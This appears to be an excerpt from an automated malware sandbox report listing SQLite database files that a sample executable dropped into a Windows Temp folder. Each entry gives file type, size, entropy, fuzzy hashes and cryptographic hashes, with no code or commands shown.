                                                                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\m8mGE3aP5I

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 7
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):1.3909341910495931
                                                                    Encrypted:false
                                                                    SSDEEP:48:ToyFawNLopFgU10XJBjKwsBjAFMtt/qEM0g9gingQeroAsaC7cUXt9P:cyxe8OwsiFMttSzefroYC7J9P
                                                                    MD5:1EB30D95ED94CA01369986C3811A0591
                                                                    SHA1:D7277FF6C5D5F55A4B0576045C2928D7501E7AFC
                                                                    SHA-256:CA8D4F98E4AD0ED1F66819E90024EB527A7A46DC26D84FB9FF5F1829B6331F46
                                                                    SHA-512:D5C8BA028977ABA2416D2C02D50FD2535F646003D8F443A01E00C6FC9385F16A6C051502D3947CABF592C619E3E0A22EC586AD57876E517C7B5BB749D396ABA7
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\mAeHUzzEOl

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 7
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):1.3909341910495931
                                                                    Encrypted:false
                                                                    SSDEEP:48:ToyFawNLopFgU10XJBjKwsBjAFMtt/qEM0g9gingQeroAsaC7cUXt9P:cyxe8OwsiFMttSzefroYC7J9P
                                                                    MD5:1EB30D95ED94CA01369986C3811A0591
                                                                    SHA1:D7277FF6C5D5F55A4B0576045C2928D7501E7AFC
                                                                    SHA-256:CA8D4F98E4AD0ED1F66819E90024EB527A7A46DC26D84FB9FF5F1829B6331F46
                                                                    SHA-512:D5C8BA028977ABA2416D2C02D50FD2535F646003D8F443A01E00C6FC9385F16A6C051502D3947CABF592C619E3E0A22EC586AD57876E517C7B5BB749D396ABA7
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\mGHrcDGvtM

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                    Category:dropped
                                                                    Size (bytes):114688
                                                                    Entropy (8bit):0.9746603542602881
                                                                    Encrypted:false
                                                                    SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                    MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                    SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                    SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                    SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\mLlTG5aFXO

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):40960
                                                                    Entropy (8bit):0.8553638852307782
                                                                    Encrypted:false
                                                                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                    MD5:28222628A3465C5F0D4B28F70F97F482
                                                                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\mOTyIRi2oy

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):40960
                                                                    Entropy (8bit):0.8553638852307782
                                                                    Encrypted:false
                                                                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                    MD5:28222628A3465C5F0D4B28F70F97F482
                                                                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\mavgE7naag

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                    Category:dropped
                                                                    Size (bytes):114688
                                                                    Entropy (8bit):0.9746603542602881
                                                                    Encrypted:false
                                                                    SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                    MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                    SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                    SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                    SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\mrOyWKR68X

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):49152
                                                                    Entropy (8bit):0.8180424350137764
                                                                    Encrypted:false
                                                                    SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                    MD5:349E6EB110E34A08924D92F6B334801D
                                                                    SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                    SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                    SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\nLNOK64pCx

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                    Category:dropped
                                                                    Size (bytes):114688
                                                                    Entropy (8bit):0.9746603542602881
                                                                    Encrypted:false
                                                                    SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                    MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                    SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                    SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                    SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\nNVlsxF58v

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 7
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):1.3909341910495931
                                                                    Encrypted:false
                                                                    SSDEEP:48:ToyFawNLopFgU10XJBjKwsBjAFMtt/qEM0g9gingQeroAsaC7cUXt9P:cyxe8OwsiFMttSzefroYC7J9P
                                                                    MD5:1EB30D95ED94CA01369986C3811A0591
                                                                    SHA1:D7277FF6C5D5F55A4B0576045C2928D7501E7AFC
                                                                    SHA-256:CA8D4F98E4AD0ED1F66819E90024EB527A7A46DC26D84FB9FF5F1829B6331F46
                                                                    SHA-512:D5C8BA028977ABA2416D2C02D50FD2535F646003D8F443A01E00C6FC9385F16A6C051502D3947CABF592C619E3E0A22EC586AD57876E517C7B5BB749D396ABA7
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\nOrY8tNBKR

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):106496
                                                                    Entropy (8bit):1.137181696973627
                                                                    Encrypted:false
                                                                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cR/k4:MnlyfnGtxnfVuSVumEHRM4
                                                                    MD5:2D903A087A0C793BDB82F6426B1E8EFB
                                                                    SHA1:E7872CC094C598B104DA25AC6C8BEB82DAB3F08F
                                                                    SHA-256:AD67ADF2D572EF49DC95FD1A879F3AD3E0F4103DD563E713C466A1F02D57ED9A
                                                                    SHA-512:90080A361F04158C4E1CCBB3DE653FFF742C29A49523B6143B0047930FC34DC0F1D043D3C1B2B759933E1685A4CB382FD9E41B7ACDD362A2217C3810AEF95E65
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\nQG8ie6eYD

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):106496
                                                                    Entropy (8bit):1.137181696973627
                                                                    Encrypted:false
                                                                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cR/k4:MnlyfnGtxnfVuSVumEHRM4
                                                                    MD5:2D903A087A0C793BDB82F6426B1E8EFB
                                                                    SHA1:E7872CC094C598B104DA25AC6C8BEB82DAB3F08F
                                                                    SHA-256:AD67ADF2D572EF49DC95FD1A879F3AD3E0F4103DD563E713C466A1F02D57ED9A
                                                                    SHA-512:90080A361F04158C4E1CCBB3DE653FFF742C29A49523B6143B0047930FC34DC0F1D043D3C1B2B759933E1685A4CB382FD9E41B7ACDD362A2217C3810AEF95E65
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\nbp0F8Sa2i

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):40960
                                                                    Entropy (8bit):0.8553638852307782
                                                                    Encrypted:false
                                                                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                    MD5:28222628A3465C5F0D4B28F70F97F482
                                                                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\oMFXKwBwYx

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):0.6732424250451717
                                                                    Encrypted:false
                                                                    SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                                    MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                                    SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                                    SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                                    SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\oW21qkyuVJ

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):106496
                                                                    Entropy (8bit):1.1358696453229276
                                                                    Encrypted:false
                                                                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                    MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                    SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                    SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                    SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\oWC2FhEwLi

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):40960
                                                                    Entropy (8bit):0.8553638852307782
                                                                    Encrypted:false
                                                                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                    MD5:28222628A3465C5F0D4B28F70F97F482
                                                                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\obfqlx8vm5

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):40960
                                                                    Entropy (8bit):0.8553638852307782
                                                                    Encrypted:false
                                                                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                    MD5:28222628A3465C5F0D4B28F70F97F482
                                                                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\ocRZpjy3v5

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):40960
                                                                    Entropy (8bit):0.8553638852307782
                                                                    Encrypted:false
                                                                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                    MD5:28222628A3465C5F0D4B28F70F97F482
                                                                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\oetKN5cyuj

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):0.5707520969659783
                                                                    Encrypted:false
                                                                    SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                    MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                    SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                    SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                    SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\ofavVCf9Hv

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):40960
                                                                    Entropy (8bit):0.8553638852307782
                                                                    Encrypted:false
                                                                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                    MD5:28222628A3465C5F0D4B28F70F97F482
                                                                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\ojDVNoE3fI

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):106496
                                                                    Entropy (8bit):1.1358696453229276
                                                                    Encrypted:false
                                                                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                    MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                    SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                    SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                    SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\olnkmN3XQm

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):40960
                                                                    Entropy (8bit):0.8553638852307782
                                                                    Encrypted:false
                                                                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                    MD5:28222628A3465C5F0D4B28F70F97F482
                                                                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\os9R1a4ccG

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):106496
                                                                    Entropy (8bit):1.1358696453229276
                                                                    Encrypted:false
                                                                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                    MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                    SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                    SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                    SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\p7BPnOVj3V

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                    Category:dropped
                                                                    Size (bytes):114688
                                                                    Entropy (8bit):0.9746603542602881
                                                                    Encrypted:false
                                                                    SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                    MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                    SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                    SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                    SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\pDydLqqzxX

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
